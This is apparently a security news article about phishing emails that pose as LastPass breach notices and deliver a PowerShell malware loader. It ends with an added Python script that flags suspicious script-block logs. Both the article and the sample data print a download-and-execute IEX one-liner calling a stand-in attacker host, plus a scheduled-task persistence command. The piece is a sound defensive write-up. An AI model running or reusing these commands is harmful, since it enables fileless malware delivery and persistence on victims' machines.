Cybersecurity professionals are raising alarms over a new wave of phishing emails masquerading as breach notifications from LastPass.
These messages warn recipients of an urgent account compromise and urge them to download a “security patch” to restore access.
In reality, the downloadable file contains a sophisticated malware loader designed to harvest credentials and deploy additional payloads.
The scheme has been active since early October and has already ensnared several enterprise users.
The emails leverage familiar LastPass branding, complete with company logos and links that appear to direct victims to legitimate domains.
However, closer inspection reveals subtle URL manipulations that redirect users to attacker-controlled servers hosting malicious executables.
LastPass analysts identified the campaign after observing multiple users reporting unexpected login failures and anomalous network traffic shortly after clicking the links.
Each phishing email attaches a ZIP archive named “LastPass_Security_Update.zip” containing an executable disguised as an MSI installer.
When launched, the MSI drops a PowerShell script in the user’s AppData folder and executes it via a scheduled task.
This script reaches out to a remote command-and-control server to download a second-stage payload, which is capable of keylogging, screenshot capture, and lateral movement within corporate networks.
Infection Mechanism
The core of the attack revolves around a crafted PowerShell command that downloads and executes the loader without writing the script to disk. A snippet of the obfuscated command is shown below:
IEX(New-Object Net.WebClient).DownloadString('http://malicious.example.com/loader.ps1')
This one-liner uses IEX (Invoke-Expression) to execute the downloaded content directly in memory, evading most antivirus solutions.
The loader then injects a DLL into svchost.exe to maintain persistence and bypass application whitelisting.
This campaign underscores the importance of verifying email authenticity, employing multi-factor authentication, and monitoring for unusual PowerShell activity in enterprise environments.
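As an added example (not code from the article, from LastPass, or from the campaign itself), the following Python triage script applies the monitoring advice above to PowerShell script-block log text: it flags blocks that combine in-memory execution (IEX) with a web download, create a scheduled task, or reference an AppData path. The event tuple format, the indicator patterns, the threshold and the sample log lines are assumptions constructed for illustration.

```python
import re
from dataclasses import dataclass

# Heuristics drawn from the infection chain described above. Each pattern is
# matched case-insensitively against the ScriptBlockText of a PowerShell
# script-block log event (assumed to be Event ID 4104 text passed in as a string).
INDICATORS = {
    "in_memory_exec": re.compile(r"\b(iex|invoke-expression)\b", re.I),
    "web_download": re.compile(r"net\.webclient|downloadstring|downloadfile|invoke-webrequest|\biwr\b", re.I),
    "scheduled_task": re.compile(r"schtasks(\.exe)?\s+/create|register-scheduledtask", re.I),
    "appdata_path": re.compile(r"appdata\\", re.I),
}

@dataclass
class Finding:
    record_id: int
    hits: list
    score: int
    suspicious: bool

def score_script_block(text):
    """Return the names of the indicators that fire on one script block."""
    return [name for name, rx in INDICATORS.items() if rx.search(text)]

def analyze_events(events, threshold=2):
    """events: iterable of (record_id, script_block_text). A block is flagged when
    at least `threshold` points accrue, so a lone Invoke-WebRequest in an admin
    script does not page anyone, while download-and-IEX always does."""
    findings = []
    for record_id, text in events:
        hits = score_script_block(text)
        # Download plus in-memory execution is the exact lure pattern; weight it
        # above the sum of the individual hits.
        score = len(hits) + (2 if {"in_memory_exec", "web_download"} <= set(hits) else 0)
        findings.append(Finding(record_id, hits, score, score >= threshold))
    return findings

# Constructed sample events (not real telemetry) for a stand-alone run.
SAMPLE_EVENTS = [
    (1, "Get-ChildItem C:\\Temp | Remove-Item -Force"),
    (2, "IEX(New-Object Net.WebClient).DownloadString('http://malicious.example.com/loader.ps1')"),
    (3, "schtasks /create /tn Updater /tr \"powershell -File $env:APPDATA\\update.ps1\" /sc onlogon"),
    (4, "Invoke-WebRequest https://intranet.example.local/report.csv -OutFile C:\\Reports\\r.csv"),
]

if __name__ == "__main__":
    for f in analyze_events(SAMPLE_EVENTS):
        print(f"record {f.record_id}: score={f.score} suspicious={f.suspicious} hits={f.hits}")
```

Feeding real script-block events requires enabling PowerShell Script Block Logging first; the heuristics here are a starting point for tuning, not a complete rule set.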